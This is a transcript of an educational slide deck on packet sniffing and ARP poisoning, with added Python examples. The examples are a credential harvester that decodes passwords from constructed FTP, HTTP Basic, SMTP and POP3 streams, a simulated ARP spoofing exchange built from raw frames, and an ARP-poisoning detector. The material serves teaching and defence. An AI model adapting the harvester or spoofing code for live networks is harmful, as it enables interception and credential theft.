TRANSCRIPT
PACKET SNIFFING: THE EASY WAY INTO SYSTEMS, PART 1
by Demetris Papapetrou and Michael Nicolaou
Page 2
Introduction
What is a sniffer?
• A piece of software that can look at network traffic, decode it,
and give meaningful data back
What is it used for?
• by network administrators to troubleshoot problems
• by forensic investigators to analyze malware communications
• other legitimate uses
Non-legitimate uses?
• to capture clear-text and/or hashed passwords
Page 3
Introduction
Sniffing prerequisites?
• Network Analyzer / Packet Sniffing Software
• NIC in promiscuous mode (to sniff third-party traffic; on WiFi this means monitor mode, since promiscuous mode alone does not expose other stations' 802.11 frames)
• Physical access to the network (Wired / WiFi)
Types of Sniffing
• Passive Sniffing
• Active Sniffing
Page 4
Introduction
Passive Sniffing
• Performed on a hub network (a hub repeats every frame to every port)
• Performed on wireless networks (frames are on the air for anyone in range)
• No packet injection needed to redirect traffic to us
Active Sniffing
• Performed on switched networks (a switch forwards a unicast frame only to the port that owns the destination MAC, so we normally see only our own traffic plus broadcasts)
• Need to inject packets to redirect traffic to us
Page 5
Hub Network
Page 6
Switched Network
Page 7
Active Sniffing
Active Sniffing Techniques
• SPAN Port on switch
• MAC Flooding
• Rogue DHCP Server
• ARP Poisoning
• DNS Spoofing
• DNS Cache Poisoning
• Proxy Server Poisoning
• etc
Page 8
Protocols Vulnerable to Sniffing
Clear-text Protocols
• Telnet / r-services
• FTP
• HTTP
• SMTP
• POP3
• IMAP
• SNMP
• SIP
Other Protocols & Applications
• SMB
• MSSQL
• MySQL
• Oracle
• Sybase
• VNC
• IKE
• SIP/RTP
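Once the attacker is in the path (see the ARP poisoning section that follows), the clear-text protocols in the list above give up credentials to anyone who reassembles the TCP stream. The following is an added example, not code from the original presentation or from the authors: a small harvester run over constructed client-to-server payloads for FTP, HTTP Basic, SMTP AUTH PLAIN and POP3. The sample streams, usernames and passwords are invented for the demonstration; the port-to-protocol mapping assumes default ports.

```python
import base64
import re

# Constructed client->server TCP payloads, as a sniffer would reassemble them.
# These are made-up sample streams, not a real capture.
SAMPLE_STREAMS = [
    (21,  "USER alice\r\nPASS s3cret\r\nSYST\r\n"),
    (80,  "GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
          + base64.b64encode(b"alice:s3cret").decode() + "\r\n\r\n"),
    (25,  "EHLO laptop\r\nAUTH PLAIN "
          + base64.b64encode(b"\x00bob\x00hunter2").decode() + "\r\n"),
    (110, "USER bob\r\nPASS hunter2\r\nSTAT\r\n"),
]

# Assumed default ports for the two protocols that share the USER/PASS grammar.
USER_PASS_PORTS = {21: "ftp", 110: "pop3"}


def creds_user_pass(proto, payload):
    """FTP and POP3 send the username and password as two plain commands."""
    user = re.search(r"^USER (\S+)", payload, re.M)
    pw = re.search(r"^PASS (\S+)", payload, re.M)
    return [(proto, user.group(1), pw.group(1))] if user and pw else []


def creds_http_basic(payload):
    """HTTP Basic auth is base64 of 'user:password', i.e. reversible, not hashed."""
    found = []
    for m in re.finditer(r"^Authorization: Basic (\S+)", payload, re.M | re.I):
        decoded = base64.b64decode(m.group(1)).decode(errors="replace")
        user, _, pw = decoded.partition(":")
        found.append(("http-basic", user, pw))
    return found


def creds_smtp_plain(payload):
    """SASL PLAIN (RFC 4616) packs authzid\\0authcid\\0password, base64-encoded."""
    found = []
    for m in re.finditer(r"^AUTH PLAIN (\S+)", payload, re.M | re.I):
        parts = base64.b64decode(m.group(1)).split(b"\x00")
        if len(parts) == 3:
            found.append(("smtp-auth-plain", parts[1].decode(), parts[2].decode()))
    return found


def harvest(streams):
    """Dispatch each stream on its destination port and collect (protocol, user, password)."""
    out = []
    for port, payload in streams:
        if port in USER_PASS_PORTS:
            out += creds_user_pass(USER_PASS_PORTS[port], payload)
        elif port == 80:
            out += creds_http_basic(payload)
        elif port == 25:
            out += creds_smtp_plain(payload)
    return out


if __name__ == "__main__":
    for proto, user, pw in harvest(SAMPLE_STREAMS):
        print(f"{proto:16} {user}:{pw}")
```

The point to take from the HTTP and SMTP cases is that base64 is an encoding, not a hash: the sniffer recovers the original password with one decode call.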
Page 9
ARP Poisoning
Page 10
OSI 7 Layers and the ARP Protocol
Application: HTTP, FTP, SMTP
Presentation: MIME, MPEG
Session: RPC, NETBIOS
Transport: TCP, UDP
Network: IP
Data Link: Ethernet, ARP (ARP sits between the Data Link and Network layers: it maps Network-layer IP addresses to Data Link MAC addresses)
Physical
Page 11
Address Resolution Protocol (ARP)
What is it?
• Protocol for mapping IP addresses to MAC addresses
• Restricted to the LAN (never crosses a router)
• Requests are broadcast on the Ethernet segment; replies are unicast
• Uses requests and replies
• Uses announcements (Gratuitous ARP)
• Machines cache IP to MAC mappings (ARP table); there is no authentication of who sent a reply
Page 12
Normal Traffic - ARP Communication
Alice
Bob
ARP (Bob → broadcast): Who has Alice's IP? Tell Bob.
ARP (Alice → Bob): Alice's IP is at xx:xx:xx:xx (Alice's MAC)
Page 13
Normal Traffic – IP Communication
Alice
Bob
Bob → Alice: dst IP Alice's, dst MAC Alice's
Alice → Bob: dst IP Bob's, dst MAC Bob's
Page 14
Normal Traffic – Packet Capture
Page 15
ARP Poisoning – Spoofed packets
Alice
Bob
Chuck
ARP (Chuck → Bob): Alice's IP is at Chuck's MAC
ARP (Chuck → Alice): Bob's IP is at Chuck's MAC
Page 16
ARP Poisoning – Redirected Request
Alice
Bob
Chuck
Alice → Chuck: dst IP Bob's, dst MAC Chuck's (Alice's poisoned ARP table resolves Bob's IP to Chuck)
Chuck → Bob: dst IP Bob's, dst MAC Bob's (Chuck forwards the request so Bob notices nothing)
Page 17
ARP Poisoning – Redirected Reply
Alice
Bob
Chuck
Bob → Chuck: dst IP Alice's, dst MAC Chuck's (Bob's poisoned ARP table resolves Alice's IP to Chuck)
Chuck → Alice: dst IP Alice's, dst MAC Alice's (Chuck forwards the reply; he now sees both directions)
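The exchange on pages 12 to 17, as an added example that is not part of the original presentation: ARP request and reply frames are built byte-for-byte (RFC 826 layout inside an Ethernet II frame), two hosts keep a minimal ARP cache the way an unauthenticated stack does, and Chuck's two spoofed replies are then shown to redirect both Alice's and Bob's next-hop MAC to him. Nothing is sent on a real network. The mapping of Alice to the victim 10.10.10.2, Bob to the router 10.10.10.1 and Chuck to the attacker 10.10.10.4 follows the demo diagram; the MAC addresses and the simplified cache-update rule are assumptions made for the example.

```python
import struct

# Ethernet / ARP constants (RFC 826, EtherType 0x0806)
ETH_P_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

# IPs follow the demo diagram; the MAC addresses are invented for this example.
ALICE = ("10.10.10.2", "00:11:22:33:44:02")   # victim
BOB = ("10.10.10.1", "00:11:22:33:44:01")     # router / gateway
CHUCK = ("10.10.10.4", "00:11:22:33:44:04")   # attacker


def mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def ip_bytes(ip): return bytes(int(o) for o in ip.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp(op, sender_ip, sender_mac, target_ip, target_mac, dst_mac):
    """Ethernet II header followed by a 28-byte ARP packet (htype 1, ptype IPv4)."""
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode the fields a host's ARP code looks at. Offsets: 14-byte Ethernet header, then ARP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class Host:
    """Minimal host model: answers requests for its own IP and learns from any reply
    addressed to it. No check that it ever asked, which is what poisoning exploits."""

    def __init__(self, ip, mac):
        self.ip, self.mac, self.cache = ip, mac, {}

    def answer(self, frame):
        p = parse_arp(frame)
        if p["op"] == ARP_REQUEST and p["target_ip"] == self.ip:
            return build_arp(ARP_REPLY, self.ip, self.mac,
                             p["sender_ip"], p["sender_mac"], p["sender_mac"])
        return None

    def receive(self, frame):
        p = parse_arp(frame)
        if p["op"] == ARP_REPLY and p["target_ip"] == self.ip:
            self.cache[p["sender_ip"]] = p["sender_mac"]   # assumed simplified merge rule

    def next_hop_mac(self, dst_ip):
        """The destination MAC this host would put on a frame for dst_ip."""
        return self.cache.get(dst_ip)


def normal_exchange():
    """Pages 12-13: Bob broadcasts a request for Alice's IP, Alice replies, Bob caches it."""
    alice, bob = Host(*ALICE), Host(*BOB)
    request = build_arp(ARP_REQUEST, BOB[0], BOB[1], ALICE[0], "00:00:00:00:00:00", BROADCAST)
    bob.receive(alice.answer(request))
    return bob.next_hop_mac(ALICE[0])


def poisoned_exchange():
    """Pages 15-17: Chuck sends two unsolicited replies; afterwards both hosts frame
    traffic for each other to Chuck's MAC, so he can forward and read both directions."""
    alice, bob = Host(*ALICE), Host(*BOB)
    to_bob = build_arp(ARP_REPLY, ALICE[0], CHUCK[1], BOB[0], BOB[1], BOB[1])      # "Alice's IP is at Chuck's MAC"
    to_alice = build_arp(ARP_REPLY, BOB[0], CHUCK[1], ALICE[0], ALICE[1], ALICE[1])  # "Bob's IP is at Chuck's MAC"
    bob.receive(to_bob)
    alice.receive(to_alice)
    return alice.next_hop_mac(BOB[0]), bob.next_hop_mac(ALICE[0])


if __name__ == "__main__":
    print("normal:   Bob resolves Alice to", normal_exchange())
    print("poisoned: Alice->Bob and Bob->Alice now go to", poisoned_exchange())
```

Real stacks differ in detail (some only update an existing entry, some also honour gratuitous requests), but none of them verify the sender, so the outcome shown by `poisoned_exchange` holds on an unprotected switched LAN. Chuck must also forward the frames he receives, or the victims simply lose connectivity and notice.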
Page 18
Logical Network Diagram - Demo
Internet
Router: 10.10.10.1
Attacker: 10.10.10.4
Victim: 10.10.10.2
Page 19
DEMO
Page 20
ARP Poisoning Countermeasures
"DHCP Snooping" and "Dynamic ARP Inspection" (Cisco switches)
Static ARP entries (built-in commands, ARPFreeze)
3rd party prevention tools (AntiARP, ArpStar, ArpON)
3rd party detection tools (Arpwatch, Winarpwatch)
IDS/IPS detection rules
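To make the detection-tool entries concrete, here is an added example (not code from the original presentation or from Arpwatch) of the three checks such a monitor applies to a stream of observed ARP packets: a reply nobody requested, an IP whose MAC changed since it was first learned, and one MAC claiming the gateway plus other hosts. The input is a constructed trace described as tuples rather than raw frames, the gateway IP 10.10.10.1 is taken from the demo diagram, and the MAC addresses are invented.

```python
from collections import defaultdict

GATEWAY_IP = "10.10.10.1"   # from the demo diagram

# Invented MACs for the constructed trace
ROUTER_MAC = "00:11:22:33:44:01"
VICTIM_MAC = "00:11:22:33:44:02"
ATTACKER_MAC = "00:11:22:33:44:04"


class ArpWatch:
    """Stateful ARP monitor. Each observed packet is (op, sender_ip, sender_mac, target_ip)."""

    def __init__(self, gateway_ip=GATEWAY_IP):
        self.gateway_ip = gateway_ip
        self.table = {}                      # ip -> mac as first learned
        self.pending = set()                 # (requester_ip, requested_ip) broadcast requests
        self.ips_by_mac = defaultdict(set)   # mac -> every ip it has claimed
        self.alerts = []

    def observe(self, op, sender_ip, sender_mac, target_ip):
        if op == "request":
            # A real tool would age these out; kept forever here for simplicity.
            self.pending.add((sender_ip, target_ip))
            return
        # A reply is legitimate only if the target asked for this IP beforehand.
        if (target_ip, sender_ip) in self.pending:
            self.pending.discard((target_ip, sender_ip))
        else:
            self.alerts.append(f"unsolicited reply: {sender_ip} is-at {sender_mac} sent to {target_ip}")
        # Arpwatch-style flip-flop check against the first-learned mapping.
        old = self.table.setdefault(sender_ip, sender_mac)
        if old != sender_mac:
            self.alerts.append(f"changed mapping: {sender_ip} was {old}, now {sender_mac}")
        # One MAC claiming the gateway and another host is the MITM signature from page 15.
        claimed = self.ips_by_mac[sender_mac]
        claimed.add(sender_ip)
        if len(claimed) > 1 and self.gateway_ip in claimed:
            self.alerts.append(f"{sender_mac} claims the gateway and other hosts: {sorted(claimed)}")


def run_trace():
    """Constructed trace: one legitimate resolution, then Chuck's two spoofed replies."""
    mon = ArpWatch()
    mon.observe("request", "10.10.10.2", VICTIM_MAC, "10.10.10.1")     # victim asks for the router
    mon.observe("reply", "10.10.10.1", ROUTER_MAC, "10.10.10.2")       # router answers: no alert
    mon.observe("reply", "10.10.10.2", ATTACKER_MAC, "10.10.10.1")     # "victim is at attacker" -> router
    mon.observe("reply", "10.10.10.1", ATTACKER_MAC, "10.10.10.2")     # "router is at attacker" -> victim
    return mon.alerts


if __name__ == "__main__":
    for line in run_trace():
        print("ALERT", line)
```

Note the limitation visible in the trace: the first spoofed reply poisons the monitor's own table for 10.10.10.2, because the victim's real MAC was never seen in a reply. Tools that learn on first sight share this weakness, which is why switch-enforced DHCP snooping with Dynamic ARP Inspection, or static entries, is the stronger control.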
Page 21
In Part 2 of this series
DNS Spoofing
NBNS Spoofing
Proxy Server Poisoning
Credential Harvesting
Rogue Software Updates
Traffic Manipulation and Client-Side Attacks
Page 22
Download Presentation
Presentation slides available at
www.qsecure.com.cy/whitepapers/Packet_Sniffing_Part1.pdf
Page 23
We would be happy to help.
Do You Have Any Questions?